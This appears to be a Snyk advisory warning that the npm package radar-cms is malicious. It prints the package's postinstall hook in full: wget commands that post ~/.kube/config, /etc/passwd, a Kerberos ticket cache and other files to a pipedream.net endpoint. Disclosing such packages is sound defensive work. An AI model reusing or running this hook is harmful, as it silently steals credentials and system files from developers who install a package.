Snyk has a published code exploit for this vulnerability.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsAvoid using all malicious instances of the radar-cms
package.
radar-cms is a malicious package.
The package was found to have a post-install
command which when executed will exfiltrate multiple files from a host machine.
"postinstall": "wget --post-file ~/.kube/config https://entfet95itcxpuu.m.pipedream.net;wget
--post-file package.json https://entfet95itcxpuu.m.pipedream.net;wget --post-file /etc/passwd
https://entfet95itcxpuu.m.pipedream.net;wget --post-file /tmp/krb5cc_0
https://entfet95itcxpuu.m.pipedream.net;wget --post-file /etc/hosts
https://entfet95itcxpuu.m.pipedream.net"